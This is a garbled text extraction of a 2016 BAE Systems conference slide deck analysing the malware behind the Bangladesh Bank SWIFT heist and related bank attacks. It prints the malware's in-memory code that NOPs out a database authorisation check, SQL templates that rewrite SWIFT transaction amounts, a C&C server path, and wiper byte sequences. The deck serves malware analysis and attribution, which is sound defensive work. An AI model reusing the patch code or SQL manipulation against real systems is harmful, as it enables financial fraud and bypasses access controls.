1 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

BAE$SystemsThe$evolution$of$financial$malware$– Bangladesh$Bank$Heist$Case$StudySergei+Shevchenko+(Security+Researcher,+ BAE+Systems+Applied+Intelligence)

3 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.

.data:0040F818+20+32+30+3A+20+54+72+61+a20Transactio_0+db+'+20:+Transaction',0+;+DATA+XREF:+sub_406B40

.data:0040F83C+46+45+44+45+52+41+4C+20+Str+++++++++++++db+'FEDERAL+RESERVE+BANK',0

.data:0040F8A4+46+49+4E+20+39+30+30+20+aFin900Confirma+db+'FIN+900+Confirmation+of+Debit',0

.data:0040F8EC+63+6D+64+2E+65+78+65+20+aCmd_exeCEchoEx+db+'cmd.exe+/c+echo+exit+|+"%s"+VS+/+as+sysdba+@%s+>+"%s"',0

.data:0040F484+53+45+4C+45+43+54+20+4D+aSelectMesg_fin+db+'SELECT+MESG_FIN_CCY_AMOUNT+FROM+SAAOWNER.MESG_%s+WHERE+MESG_S_UMI‘

.data:0040F484+43+43+59+5F+41+4D+4F+55+ db+'D+=+',27h,'%s',27h,';',0

.data:0040F18C+6C+69+62+6F+72+61+64+62+aLiboradb_dll+++db+'liboradb.dll',0 ;+DATA+XREF:+patch_liboradb_dll+F2o

.data:0040F0D4+41+6C+6C 69+61+6E+73+00+aAllians db+'Allians',0 ;+DATA+XREF:+make_paths+32o

.data:0040F220+53+45+4C+45+43+54+20+43+aSelectC_text_s+db+'SELECT+C.TEXT_S_UMID+FROM+(SELECT+A.TEXT_S_UMID,+A.TEXT_DATA_BLOC‘

.data:0040F220+54+20+41+2E+54+45+58+54+ db+' =+B.MESG_S_UMID+AND+B.MESG_SENDER_SWIFT_ADDRESS+LIKE+',27h,'%%%s%%',27h

.data:0048F478+25+2E+32+49+36+34+64+00 a_2i64d+++++++++db+'%.2I64d',0 ;+DATA+XREF:+sub_45A500+6Fo

.data:0048F480+4D+61+00++ aMa db+'Ma',0 ;+DATA+XREF:+sub_45A760+9Ao

.data:0048F483+00 align+43A+20+53+74+61+74+65+6D+aStatementLine++db+':+Statement+Line',0 ;+DATA+XREF:+sub_45A760+5Co00+00+00+ align+443+6C+6F+73+69+6E+67+20+aClosingBalance+db+'Closing+Balance+(Booked+Funds)',0

.data:0048F498+42+61+6C+61+6E+63+65+20+++++++++++++++++++++++++++++++++++++++++;+DATA+XREF:+sub_45A880+5Do

.data:0048F4B8+50+4F+53+5F+54+45+4D+50+aPos_temp+++++++db+'POS_TEMP',0+++++++++;+DATA+XREF:+sub_45A880+36o

.data:0048F4B8+00+ ;+sub_45A880+109o+...

.data:0048F4C4+2D+2D 2D 2D 2D 2D 2D 2D+asc_48F4C4++++++db+'VVVVVVVVVVVVVVVVVVVVV',0

.data:0048F4C4+2D+2D 2D 2D 2D 2D 2D 2D++ ;+DATA+XREF:+sub_45A9C0+D1o

.data:0048F4C4+2D+2D 2D 2D 2D 00 ;+sub_45B630+1A0o

.data:0048F4DC+20+4F+70+65+6E+69+6E+67+aOpeningBalance+db+'+Opening+Balance',0+;+DATA+XREF:+sub_45AAE0:loc_45AAFBo

.data:0048F4ED+00+00+00 align+10h

.data:0048F4F0+53+65+6E+64+65+72+00 aSender db+'Sender',0+++++++++++;+DATA+XREF:+sub_45AB80:loc_45ABA0o

.data:0048F4F7+00 align+4

.data:0048F4F8+23+25+73+23+00+ aS_5++++++++++++db+'#%s#',0+++++++++++++;+DATA+XREF:+sub_45AC00+117o

.data:0048F4FD+00+00+00+ align+10h

.data:0048F500+3A+20+44+65+62+69+74+00 aDebit_0++++++++db+':+Debit',0++++++++++;+DATA+XREF:+sub_45AC00+E5o

.data:0048F508+3A+20+43+72+65+64+69+74+aCredit+++++++++db+':+Credit',0+++++++++;+DATA+XREF:+sub_45AC00+CEo

.data:0048F508+00+ ;+sub_45AC00+234o+...

.data:0048F511+00+00+00 align+4

.data:0048F514+20+44+65+62+69+74+00 aDebit db+'+Debit',0+++++++++++;+DATA+XREF:+sub_45AC00+94o

.data:0048F51B+00 align+4

.data:0048F51C+50+4F+53+5F+50+41+47+45+aPos_page_start+db+'POS_PAGE_START',0+++;+DATA+XREF:+sub_45B210+51o

.data:0048F51C+5F+53+54+41+52+54+00 ;+sub_45B210+E0o+...

.data:0048F52B+00+ align+4

.data:0048F52C+20+43+72+65+64+69+74+00+aCredit_0+++++++db+'+Credit',0++++++++++;+DATA+XREF:+sub_45B3D0+DAo

.data:0048F534+3A+20+43+6C+6F+73+69+6E+aClosingAvailBa+db+':+Closing+Avail+Bal+(Avail+Funds)',0

.data:0048F534+67+20+41+76+61+69+6C+20+ ;+DATA+XREF:+sub_45B630+261o

.data:0048F556+00+00+++++++++++++++++++++++++++++++++++align+4

.data:0048F558+4D+65+73+73+61+67+65+20+aMessageTrailer+db+'Message+Trailer',0 ;+DATA+XREF:+sub_45B630+1F8o

.data:0048F568+4D+65+73+73+61+67+65+20+aMessageText++++db+'Message+Text',0+ ;+DATA+XREF:+sub_45B630+1E2o

.data:0048F575+00+00+00 align+4

.data:0048F578+4D+65+73+73+61+67+65+20+aMessageHeader++db+'Message+Header',0+++;+DATA+XREF:+sub_45B630+1CCo

.data:0048F587+00 align+4

.data:0048F588+49+6E+73+74+61+6E+63+65+aInstanceTypeAn+db+'Instance+Type+and+Transmission',0

.data:0048F588+20+54+79+70+65+20+61+6E+ ;+DATA+XREF:+sub_45B630+1B6o

.data:0048F588+64+20+54+72+61+6E+73+6D+ ;+PARSE_PDF:loc_45BBC0o

<rpcgroup>..<rpci>..*/bbw/cmserver/*..217.172.177. 12/redirect.php..<ssq>1</ssq>

Sergei$Shevchenko,$Cyber$Security$Research

The+Evolution+of+Financial+MalwareBangladesh+Bank+Heist+Case+Study

4 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Watering+Hole+Attacks

5 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

1/3+out+of+10+mln websites+run+CMS

31,581 PLUGINS

>100+VULNERABILITIESFIXED+SINCE+2008

6 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

1/3+out+of+10+mln websites+run+CMS

7 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Organised+Cyber+Crime˃Targeting+Different+Levels+of+the+Society

Ordinary+PeopleZeuS/CarberpDridex/Dyre

8 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

The+Rise+of+POS+Malware˃ATM+Malware

Early+signs+of+such+diversification+efforts+were+noticed+back+in+2009

Insiders+or+corrupt+technical+support+employees+infected+a+number+of+Diebold ATMs+(running+Windows+XP),+allowing+the+attackers+to+instruct+the+infected+ATMs+to+dispense+cash.

9 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

The+Rise+of+POS+Malware˃POS+Malware+(BlackPOS etc.)

10 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Organised+Cyber+Crime˃Targeting+Different+Levels+of+the+Society

ATM/POSATM/POS+Malware

11 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

2015:+Carbanak,+an+attack+from+inside˃Attack+against+a+Bank+Infrastructure

In+2015,+a+new+breed+of+malware,+Carbanak,+was+found+and+reported+by+Kaspersky+Lab.

The+malware+and+the+group+of+attackers+behind+it+were+able+to+compromise+up+to+100+financial+institutions+from+the+inside.+

Not+only+did+they+manage+to+steal+information+about+thousands+or+private+customers,+but+they+were+also+able+to+remotely+instruct+ATMs+to+dispense+cash,+leading+to+substantial+financial+losses.

12 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Organised+Cyber+Crime˃Targeting+Different+Levels+of+the+Society

Bank InfrastructureCarbanak

13 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Life+imitating+ArtHOLLYWOOD $(2001)

CYBER $ SPACE $ (2016)

$150M

$951M

14 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

US+BANK Compromised+BankCorr.+Account

Schematics+of+Cyber+Heist˃Compromised+Bank+Operation

Offshore+Bank

15 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

US+BANK Compromised+BankCorr.+Account

Offshore+Bank

Schematics+of+Cyber+Heist˃Compromised+Bank+Operation

16 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Bangladesh+Bank+Heist˃Patch

3.+Malware+checks+to+see+if+any+processes+have+‘liboradb.dll’+module+loaded

4.+If+found,+it+overwrites+2+bytes+at+a+specific+offset with+‘do+nothing’+(0x90+ NOP)+instructions

5.+Overwritten+bytes+forces+the+host+application+to+always+pass+the+validity+check

6.+The+malware+is+now+able+to+execute+database+transactions

if (VirtualProtectEx(hProcess, lpAddr, 2, PAGE_EXECUTE_READWRITE, (PDWORD)&hProcess)&& ReadProcessMemory(hProcess, lpAddr, &buffer, 2, &dwRead))

{if (bPatch){

if ((WORD)buffer == JNZ)res = WriteProcessMemory(hProcess, lpAddr, &NOPs, 2, &dwWritten);

}else{

if ((WORD)buffer == NOPs)res = WriteProcessMemory(hProcess, lpAddr, &JNZ, 2, &dwWritten);

}if (res)

VirtualProtectEx(hProcess, lpAddr, 2, hProcess, &flOldProtect);}

.data:0040F170 NOPs db 90h

.data:0040F171 db 90h

.data:0040F174 JNZ db 75h

.data:0040F175 db 4

17 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Bangladesh+Bank+Heist˃Patch+Result

85 C0 test eax, eax ; DB authorisation check75 04 jnz failed ; if failed, jump to 'failed' label below33 c0 xor eax, eax ; otherwise, set result to 0 (success)eb 17 jmp exit ; and then exit

failed:B8 01 00 00 00 mov eax, 1 ; set result to 1 (failure)

85 C0 test eax, eax ; DB authorisation check90 nop ; 'do nothing' in place of 0x7590 nop ; 'do nothing' in place of 0x0433 c0 xor eax, eax ; always set result to 0 (success)eb 17 jmp exit ; and then exit

failed:B8 01 00 00 00 mov eax, 1 ; never reached: set result to 1 (failure)

Original+Code:

Patched+Code:

18 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Bangladesh+Bank+Heist˃Patch

?Authorised?

NO

YES

Full+Access

DataBase

Do$Nothing

Do$Nothing

19 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Bangladesh+Bank+Heist˃Replacing+the+2+bytes+affects+8+bits+only

= 1090 9075 04 1 0 0 0 0 0 0 010 01 01 01 01 0110

What’s+easier+to+flip?+This?

Or+this?

20 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Bangladesh+Bank+Heist˃SQL+queries

UPDATE+SAAOWNER.MESG_%s+SET MESG_FIN_CCY_AMOUNT =+'%s'+WHERE+MESG_S_UMID+=+'%s'mUPDATE+SAAOWNER.TEXT_%s+SET+TEXT_DATA_BLOCK+=+UTL_RAW.CAST_TO_VARCHAR2('%s')+WHERE+TEXT_S_UMID+=+'%s'm

Monitoring+Login/Logout+events+in+the+journal:SELECT+*+FROM+(SELECT+JRNL_DISPLAY_TEXT,+JRNL_DATE_TIME FROM+SAAOWNER.JRNL_%s+WHERE+JRNL_DISPLAY_TEXT LIKE+'%%LT+BBHOBDDHA:+Log%%'+ORDER+BY+JRNL_DATE_TIME+DESC)+A+WHERE+ROWNUM+=+1m

‘BBHOBDDH’ is+the+SWIFT+code+for+the+Bangladesh+Bank+in+Dhaka

GET:+[C&C_server]/al?tttO

Manipulating+balances+(The+amount+of+Convertible+Currency):

Sending+‘doctored’+(manipulated)+SWIFT+confirmation+messages for+local+printing:

21 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.

This+was+not+the+only+heist…

22 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Cyber+Heist:+Vietnam+

Received+PDF+Statement

XML+FileRead+blocks+onetbytoneIgnore+blocks+with+MESSAGE_FILENAME

PDF

Modified+PDF+FilePass+Modified+PDF+File+ to+FoxIT Reader

User+opens+the+Modified+PDF+File

User+opens+the+PDF+File

Trojan+reads+PDF+FileConverts+into+XML

Trojan+reads+XMLConverts+into+PDF

Temporary+File

PDFPDF

PDFSWIFT+Service+Bureau+(was not+compromised)

Fraudulent+Requests

23 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.

Attribution clues…

24 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Attribution+cluesDistinctive+2tstep+‘wipetout’+and+‘filetdelete’+functions:

ttt>+which+led+to+a+further+sample: msoutc.exe$ –c6eb8e46810f5806d056c4aa34e7b8d8a2c37cad

25 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

AttributionWipeout+function(msoutc.exe,+2014)

Wipetout+function(Vietnam+malware,+2015)

B820100000E8B64E0000535557FF150090400050FF154C90400083C404C644240CFFFF156890400025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF15A4AC40008BE883FDFF7510FF151C9040005F5D5B81C420100000C3566A02536AFF55FF15D4AC40008D4C242453518D5424386A015255FF15ACAC400055FF15C8AC4000

1EFFFFFF55FF15A8AC40008B9424341000005352E847FDFFFF83C4085E5F5D5B

B820100000E896EA0400535557FF154CF0450050FF152CF1450083C404C644240CFFFF1524F1450025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF1548F045008BE883FDFF7510FF1508F045005F5D5B81C420100000C3566A02536AFF55FF1544F045008D4C242453518D5424386A015255FF1540F0450055FF153CF04500

1EFFFFFF55FF1510F045008B9424341000005352E847FDFFFF83C4085E5F5D5B

B64E00 96EA0400 4C9040 F0454C9040 2CF145

689040 24F145

A4AC40 48F0451C9040 08F045

D4AC40 44F045ACAC40 40F045C8AC40 3CF045

A8AC40 10F045

26 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Attribution

US+Cert+Alert PwC msoutc.exe

FwtSqmSession106829323_S-1-5-19

FwtSqmSession106829323_S-1-5-19

FwtSqmSession106839323_S-1-5-20

y0uar3@s!llyid!07,ou74n60u7f001

y@s!11yid60u7f!07ou74n001

y@s!11yid60u7f!07ou74n001

DEC JAN FEB MAR APR

CompiledCompiled Discovered Discovered

Event EventVietnam

Vietnam

Bangladesh

Bangladesh

Tien PhongBank:Heist+Attempt

BangladeshBank+Heist

Foxit Reader.exemspdclr.exe

evtsys.exeevtdiag.exenroff_b.exe

Foxit Reader.exemspdclr.exe

evtsys.exeevtdiag.exenroff_b.exe

Vietnam Bangladesh

Trojanised+Foxit Reader/SWIFT+Message+Cleaner Main+Malware+used+in+Bangladesh+Heist

2015+++++2016

4tDect2015

8tDect2015

16tDect201522tDect2015 4tFebt2016/

5tFebt201628tFebt2016 25tMart2016

27 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.

Timeline+of+the+known+attacks

28 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Timeline+of+the+attacks:+Group+#1+(Unknown)

Late$2014$Z 2015Malware:• exe+compiled+from+Python+scripts:

• pyinstaller generated+exe+files• python+scripts+fetch/execute+ shellcode

• ‘legit’+remote+access+tools• ‘Atelier+Web+Remote+Commander’• ‘Anyplace+Control’

• ‘legit’+Veil+Framework

Ecuador

29 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Timeline+of+the+attacks:+Group+#2+(Lazarus)

Vietnam:$December$2015

Malware:

• Manipulation+of+the+PDF+statements+from+the+bank’s+Service+Bureau

Vietnam

30 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Timeline+of+the+attacks:+Group+#2+(Lazarus)

Bangladesh:$February$2016

Malware:• SWIFT+messages+manipulation• Compromises+SWIFT+Alliance+Software• Direct+DB+manipulation

Bangladesh

31 Copyright+2016+ BAE+Systems.+All+Rights+Reserved.|+

Timeline+of+the+attacks:+Group+#3+(Carbanak)April$2016

Infection+Vector:• SpeartPhishing,+RIG+Exploit+KitMalware:• MBR+code,+wipes+out+HDD• Backdoor+Shellcode,+port+8888+(open+source)• “Toshliph”:+links+to+CarbanakTargets:• ATMs• Etpayment+systems• onlinetbanking

Ukraine

Hong$Kong

Taiwan(China)

Thailand

32 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.

We’re+now+working+with+SWIFT+to+investigate+new+cases

33 |+Copyright+2016+ BAE+Systems.+All+Rights+Reserved.

Thank+You.